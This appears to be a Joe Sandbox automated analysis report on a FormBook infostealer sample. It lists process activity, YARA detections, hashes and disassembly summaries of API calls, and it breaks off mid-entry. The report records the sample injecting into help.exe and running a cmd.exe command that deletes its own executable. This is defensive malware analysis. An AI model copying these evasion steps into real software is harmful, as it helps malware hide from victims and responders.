                                                                                                                  File size:841'224 bytes
                                                                                                                  MD5 hash:E2EDA8C49AB184DE6D3B030BD499E4D1
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:14:41:11
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff62d7d0000
                                                                                                                  File size:5'141'208 bytes
                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:14:41:14
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\SysWOW64\help.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                  Imagebase:0x7c0000
                                                                                                                  File size:10'240 bytes
                                                                                                                  MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                  Reputation:moderate
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:14:41:17
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:/c del "C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
                                                                                                                  Imagebase:0xa40000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:14:41:17
                                                                                                                  Start date:18/03/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:92
                                                                                                                    Total number of Limit Nodes:10
                                                                                                                    execution_graph 14794 a4d710 DuplicateHandle 14795 a4d7a6 14794->14795 14796 a44668 14797 a4467a 14796->14797 14798 a44686 14797->14798 14802 a44778 14797->14802 14807 a43e40 14798->14807 14800 a446a5 14803 a4479d 14802->14803 14811 a44888 14803->14811 14815 a44879 14803->14815 14808 a43e4b 14807->14808 14823 a45c5c 14808->14823 14810 a470c0 14810->14800 14812 a448af 14811->14812 14814 a4498c 14812->14814 14819 a444c4 14812->14819 14817 a44888 14815->14817 14816 a4498c 14816->14816 14817->14816 14818 a444c4 CreateActCtxA 14817->14818 14818->14816 14820 a45918 CreateActCtxA 14819->14820 14822 a459db 14820->14822 14824 a45c67 14823->14824 14827 a45c7c 14824->14827 14826 a4716d 14826->14810 14828 a45c87 14827->14828 14831 a45cac 14828->14831 14830 a47242 14830->14826 14832 a45cb7 14831->14832 14835 a45cdc 14832->14835 14834 a47345 14834->14830 14836 a45ce7 14835->14836 14838 a4864b 14836->14838 14841 a4acf8 14836->14841 14837 a48689 14837->14834 14838->14837 14845 a4cde9 14838->14845 14850 a4ad30 14841->14850 14854 a4ad1f 14841->14854 14842 a4ad0e 14842->14838 14846 a4ce19 14845->14846 14847 a4ce3d 14846->14847 14886 a4cfa8 14846->14886 14890 a4cf99 14846->14890 14847->14837 14858 a4ae28 14850->14858 14866 a4ae19 14850->14866 14851 a4ad3f 14851->14842 14855 a4ad3f 14854->14855 14856 a4ae28 2 API calls 14854->14856 14857 a4ae19 2 API calls 14854->14857 14855->14842 14856->14855 14857->14855 14859 a4ae5c 14858->14859 14860 a4ae39 14858->14860 14859->14851 14860->14859 14874 a4b0b0 14860->14874 14878 a4b0c0 14860->14878 14861 a4ae54 14861->14859 14862 a4b060 GetModuleHandleW 14861->14862 14863 a4b08d 14862->14863 14863->14851 14867 a4ae39 14866->14867 14868 a4ae5c 14866->14868 14867->14868 14872 a4b0b0 LoadLibraryExW 14867->14872 14873 a4b0c0 LoadLibraryExW 14867->14873 14868->14851 14869 a4ae54 14869->14868 14870 a4b060 GetModuleHandleW 14869->14870 14871 a4b08d 14870->14871 14871->14851 14872->14869 14873->14869 14876 a4b0c0 14874->14876 14875 a4b0f9 14875->14861 14876->14875 14882 a4a1c8 14876->14882 14879 a4b0d4 14878->14879 14880 a4b0f9 14879->14880 14881 a4a1c8 LoadLibraryExW 14879->14881 14880->14861 14881->14880 14883 a4b2a0 LoadLibraryExW 14882->14883 14885 a4b319 14883->14885 14885->14875 14888 a4cfb5 14886->14888 14887 a4cfef 14887->14847 14888->14887 14894 a4bb80 14888->14894 14893 a4cfb5 14890->14893 14891 a4cfef 14891->14847 14892 a4bb80 3 API calls 14892->14891 14893->14891 14893->14892 14895 a4bb85 14894->14895 14897 a4dd08 14895->14897 14898 a4d1a4 14895->14898 14897->14897 14899 a4d1af 14898->14899 14900 a45cdc 3 API calls 14899->14900 14901 a4dd77 14900->14901 14901->14897 14902 a4d4c8 14903 a4d50e GetCurrentProcess 14902->14903 14905 a4d560 GetCurrentThread 14903->14905 14906 a4d559 14903->14906 14907 a4d596 14905->14907 14908 a4d59d GetCurrentProcess 14905->14908 14906->14905 14907->14908 14911 a4d5d3 14908->14911 14909 a4d5fb GetCurrentThreadId 14910 a4d62c 14909->14910 14911->14909

                                                                                                                    Executed Functions

                                                                                                                    Function 00A4D4B9 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D546
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00A4D583
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D5C0
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A4D619
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2063062207-3119653880
                                                                                                                    • Opcode ID: f58c95325486c93691e00070c1ae680efc389d2d7d187f6758a1032c614e8ba9
                                                                                                                    • Instruction ID: b12f131ddb614477861584748e26b83327468f1bdc9350cfd2e8bac3b598b814
                                                                                                                    • Opcode Fuzzy Hash: f58c95325486c93691e00070c1ae680efc389d2d7d187f6758a1032c614e8ba9
                                                                                                                    • Instruction Fuzzy Hash: 475168B49003498FDB14DFAAD548BAEBBF1FF88314F248459E409A73A0DB746944CF66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4D4C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D546
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 00A4D583
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00A4D5C0
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A4D619
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2063062207-3119653880
                                                                                                                    • Opcode ID: d3262ed654995f4e0751e360680f340c2b5def3ebf3df11ae824c8a6d3223171
                                                                                                                    • Instruction ID: 6bcdc6a54edd1cc3b1eae513374f7438ae891a9dc7027c14c56a9c9c9064dae5
                                                                                                                    • Opcode Fuzzy Hash: d3262ed654995f4e0751e360680f340c2b5def3ebf3df11ae824c8a6d3223171
                                                                                                                    • Instruction Fuzzy Hash: 365137B49003498FDB14DFAAD548B9EBBF1FF88314F248459E409A73A0DB746944CF66
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4AE28 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 44 a4ae28-a4ae37 45 a4ae63-a4ae67 44->45 46 a4ae39-a4ae46 call a497a0 44->46 47 a4ae69-a4ae73 45->47 48 a4ae7b-a4aebc 45->48 53 a4ae5c 46->53 54 a4ae48 46->54 47->48 55 a4aebe-a4aec6 48->55 56 a4aec9-a4aed7 48->56 53->45 99 a4ae4e call a4b0b0 54->99 100 a4ae4e call a4b0c0 54->100 55->56 57 a4aed9-a4aede 56->57 58 a4aefb-a4aefd 56->58 61 a4aee0-a4aee7 call a4a170 57->61 62 a4aee9 57->62 60 a4af00-a4af07 58->60 59 a4ae54-a4ae56 59->53 63 a4af98-a4b058 59->63 64 a4af14-a4af1b 60->64 65 a4af09-a4af11 60->65 67 a4aeeb-a4aef9 61->67 62->67 94 a4b060-a4b08b GetModuleHandleW 63->94 95 a4b05a-a4b05d 63->95 68 a4af1d-a4af25 64->68 69 a4af28-a4af31 call a4a180 64->69 65->64 67->60 68->69 75 a4af33-a4af3b 69->75 76 a4af3e-a4af43 69->76 75->76 77 a4af45-a4af4c 76->77 78 a4af61-a4af6e 76->78 77->78 80 a4af4e-a4af5e call a4a190 call a4a1a0 77->80 84 a4af70-a4af8e 78->84 85 a4af91-a4af97 78->85 80->78 84->85 96 a4b094-a4b0a8 94->96 97 a4b08d-a4b093 94->97 95->94 97->96 99->59 100->59
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00A4B07E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 4139908857-3119653880
                                                                                                                    • Opcode ID: 6a774a3b6e44f2e64d3dfc841928584d3d95a17f78cf35667fd3958bca5e1676
                                                                                                                    • Instruction ID: d9a3fb3aaae85ca68e7d4e3dfd1dea9afcafee24acb3ae2aed8f9f95392d96e1
                                                                                                                    • Opcode Fuzzy Hash: 6a774a3b6e44f2e64d3dfc841928584d3d95a17f78cf35667fd3958bca5e1676
                                                                                                                    • Instruction Fuzzy Hash: 50714574A00B058FEB24DF2AD45575ABBF1FF88700F008A2DE49AC7A40DB75E949CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4590D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 101 a4590d-a459d9 CreateActCtxA 103 a459e2-a45a3c 101->103 104 a459db-a459e1 101->104 111 a45a3e-a45a41 103->111 112 a45a4b-a45a4f 103->112 104->103 111->112 113 a45a60 112->113 114 a45a51-a45a5d 112->114 116 a45a61 113->116 114->113 116->116
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00A459C9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2289755597-3119653880
                                                                                                                    • Opcode ID: 20415ddecef4efaa842d2101344a8bae33b2cbc4de0b430a7cfc6267fc9f3501
                                                                                                                    • Instruction ID: 33ea92516096bfc22e7fe98386acc2de621f1b9b7683d0b6fa1e262a8a35b47e
                                                                                                                    • Opcode Fuzzy Hash: 20415ddecef4efaa842d2101344a8bae33b2cbc4de0b430a7cfc6267fc9f3501
                                                                                                                    • Instruction Fuzzy Hash: 7941F2B1C00719CFEB24DFA9C884B8EBBB5BF89714F20816AD408AB251DB755946CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A444C4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 117 a444c4-a459d9 CreateActCtxA 120 a459e2-a45a3c 117->120 121 a459db-a459e1 117->121 128 a45a3e-a45a41 120->128 129 a45a4b-a45a4f 120->129 121->120 128->129 130 a45a60 129->130 131 a45a51-a45a5d 129->131 133 a45a61 130->133 131->130 133->133
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 00A459C9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 2289755597-3119653880
                                                                                                                    • Opcode ID: c23e9c7d472fb9e4887204d003699d14fb0e894e3100e4e8a404d647e83856a3
                                                                                                                    • Instruction ID: a202df99dfdbb279612c2a742818a7efae1579a1ce5b680f46c340c01422a709
                                                                                                                    • Opcode Fuzzy Hash: c23e9c7d472fb9e4887204d003699d14fb0e894e3100e4e8a404d647e83856a3
                                                                                                                    • Instruction Fuzzy Hash: 0741F4B1C0071DCFDB24DFA9C844B8EBBB5BF88714F208169D408AB251DB715945CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4D708 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 134 a4d708-a4d70e 135 a4d710-a4d7a4 DuplicateHandle 134->135 136 a4d7a6-a4d7ac 135->136 137 a4d7ad-a4d7ca 135->137 136->137
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A4D797
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 3793708945-3119653880
                                                                                                                    • Opcode ID: 7ac8bd5834b0ef2615fbc22eda6b7c788c12bb1a021a8b33c0bb915d51f519b1
                                                                                                                    • Instruction ID: b59f355f5b657fbfd7df2371ed8ca13439de72b4e07518c9ab5f477b06af1c38
                                                                                                                    • Opcode Fuzzy Hash: 7ac8bd5834b0ef2615fbc22eda6b7c788c12bb1a021a8b33c0bb915d51f519b1
                                                                                                                    • Instruction Fuzzy Hash: D621E5B59003499FDB10CF9AD485ADEBBF8FB48720F14841AE958A7351D374A940CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4D710 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 140 a4d710-a4d7a4 DuplicateHandle 141 a4d7a6-a4d7ac 140->141 142 a4d7ad-a4d7ca 140->142 141->142
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A4D797
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 3793708945-3119653880
                                                                                                                    • Opcode ID: 9904f87445e8540fd751f4a63b80e4afb372f0e55fdf6562690bee4979f4de42
                                                                                                                    • Instruction ID: c456d28f7e6c9ea2a31f1fa857985359809fac46bd70b2b9a03d5222a4f1a17c
                                                                                                                    • Opcode Fuzzy Hash: 9904f87445e8540fd751f4a63b80e4afb372f0e55fdf6562690bee4979f4de42
                                                                                                                    • Instruction Fuzzy Hash: 9421F5B59003099FDB10CFAAD884ADEFBF8FB48320F14841AE918A3350D374A940CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4A1C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 145 a4a1c8-a4b2e0 147 a4b2e2-a4b2e5 145->147 148 a4b2e8-a4b317 LoadLibraryExW 145->148 147->148 149 a4b320-a4b33d 148->149 150 a4b319-a4b31f 148->150 150->149
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A4B0F9,00000800,00000000,00000000), ref: 00A4B30A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 1029625771-3119653880
                                                                                                                    • Opcode ID: ec31e9d75ae1843a97c3f3385ea1d15d3c6755a27ac6b67e7775f79897f2d203
                                                                                                                    • Instruction ID: 6f34188c3fde4eec85d17bd2b600c290befa89437e19a87af3d24e2cff199da7
                                                                                                                    • Opcode Fuzzy Hash: ec31e9d75ae1843a97c3f3385ea1d15d3c6755a27ac6b67e7775f79897f2d203
                                                                                                                    • Instruction Fuzzy Hash: DD1114B69003098FDB10CFAAC444BDEFBF4EB88710F10842ED519A7600C7B5A945CFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4B298 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 153 a4b298-a4b2e0 155 a4b2e2-a4b2e5 153->155 156 a4b2e8-a4b317 LoadLibraryExW 153->156 155->156 157 a4b320-a4b33d 156->157 158 a4b319-a4b31f 156->158 158->157
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A4B0F9,00000800,00000000,00000000), ref: 00A4B30A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 1029625771-3119653880
                                                                                                                    • Opcode ID: 12dd780021dfe17c4bc696e5649515ede0cefd98e9fd5f3548d0191c35519f71
                                                                                                                    • Instruction ID: 39fa294d9895ead06436db722072b7ff55cb1fe385c56939e86fa85eaf9a0b34
                                                                                                                    • Opcode Fuzzy Hash: 12dd780021dfe17c4bc696e5649515ede0cefd98e9fd5f3548d0191c35519f71
                                                                                                                    • Instruction Fuzzy Hash: 061114B68003499FDB10CFAAC444BDEFBF8EB88720F10842AD559A7700C779A545CFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00A4B018 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 161 a4b018-a4b058 162 a4b060-a4b08b GetModuleHandleW 161->162 163 a4b05a-a4b05d 161->163 164 a4b094-a4b0a8 162->164 165 a4b08d-a4b093 162->165 163->162 165->164
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00A4B07E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1370015029.0000000000A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_a40000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID: `&Cl
                                                                                                                    • API String ID: 4139908857-3119653880
                                                                                                                    • Opcode ID: e3f1ff4c7ac0a336c2eea0c2a08da1ab5e89d31c44f6196ed1149d8d55e13ea3
                                                                                                                    • Instruction ID: 2ddf281bef77ab0ae6e85dd4ce13611a43c60dc06c191ca9513cd1113c2f5537
                                                                                                                    • Opcode Fuzzy Hash: e3f1ff4c7ac0a336c2eea0c2a08da1ab5e89d31c44f6196ed1149d8d55e13ea3
                                                                                                                    • Instruction Fuzzy Hash: 1211DFB6C007498FDB20DFAAC444B9EFBF4EB88724F10842AD429A7610D379A545CFA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_9ed000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0f955ccfc89124708ee6f774905278643fcfc98ed9580200058924ebb21795a6
                                                                                                                    • Instruction ID: dddb1ee919c36375defc8807dbe4545b1922da127cab7e6cf9cc4deed493702b
                                                                                                                    • Opcode Fuzzy Hash: 0f955ccfc89124708ee6f774905278643fcfc98ed9580200058924ebb21795a6
                                                                                                                    • Instruction Fuzzy Hash: 2C214875104384DFDB02DF00D9C0B16BB65FBA8324F20C569E8090B2E6D33AEC46CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 009ED4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1369899464.00000000009ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 009ED000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
